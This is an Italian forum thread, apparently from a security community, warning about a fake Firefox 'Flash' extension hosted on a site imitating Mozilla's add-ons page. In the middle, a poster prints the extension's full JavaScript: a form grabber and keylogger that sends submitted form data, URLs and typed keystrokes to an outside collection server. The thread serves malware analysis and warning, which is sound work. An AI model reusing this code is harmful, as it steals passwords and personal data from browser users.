questo sito propone una falsa estensione per firefox

hqqp://www.marykiss.byethost31.com/gallery_.html

la falsa estensione viene scaricata da qui

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

.

hai dettagli di come funzioni?

virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?


se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

si spaccia per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware

virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?


se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

tenta di spacciarsi per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware

hai dettagli di come funzioni?

scarica l'estensione e aprila con 7-zip, leggi il file browserOverlay.js, il creatore ha avuto la gentilezza di commentare il codice :D


var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
var firsttime = prefManager.getBoolPref("extensions.browserOverlay.firsttime");
if (firsttime) {
prefManager.setBoolPref("extensions.browserOverlay.firsttime", false);
window.setTimeout(function(){
gBrowser.selectedTab = gBrowser.addTab("http://www.marykiss.byethost31.com/gallery.html");
}, 1500);
}



//Form submission listener
window.document.onsubmit = search;

//Search the document forms
function search() {
var forms = content.document.getElementsByTagName('form');
for(var i=0; i<forms.length; i++) {
if(forms[i].id)
var form = content.document.getElementById(forms[i].id);
else
var form = content.document.forms[i];

if(form.elements[i].value != '')
found(form);
}
}

//Save information from the target form
function found(form) {
//EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPT
var host = 'http://www.skepxis.byethost6.com/save.php';

//Record time and date
var currentTime = new Date();
var minutes = currentTime.getMinutes();
if (minutes < 10)
minutes = '0' + minutes;
var date = currentTime.getHours()+':'+minutes+' || '+currentTime.getMonth()+1+'/'+currentTime.getDate()+'/'+currentTime.getFullYear();
var keyz = host+'?time='+date+'&p-domain='+content.document.location.href;

//Add the collected form data
for(var c=0; c<form.elements.length; c++)
keyz += '&'+form.elements[c].name+'='+form.elements[c].value;
send(keyz);
}

//Send the information
function send(keyz) {
var xmlhttp;
if (window.XMLHttpRequest)
xmlhttp = new XMLHttpRequest();
else if (window.ActiveXObject)
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("GET",keyz,true);
xmlhttp.send(null);
}

<![CDATA[
document.addEventListener("keypress",onkey,false);
var keyss='';
var link='';

function onkey(e) {

keyss+=String.fromCharCode(e.charCode);

link=content.document.location.href;


if (keyss.length>20) {
http=new XMLHttpRequest();
http.open("GET","http://www.skepxis.byethost6.com/key_strokes.php?keylog=" + keyss+'-------'+ link +'-------',true);
http.send(null);
keyss='';
}
}

]]>

.

Se la installassi su firefox per mac o linux funzionerebbe?

credo di sì

ho provveduto ad inviare il file xpi ad Avira e ovviamente hanno trovato che

browserOverlay.js MALWARE

una curiosità nella mail mi parlano in spagnolo :D anche se avevo selezionato di rispondermi in inglese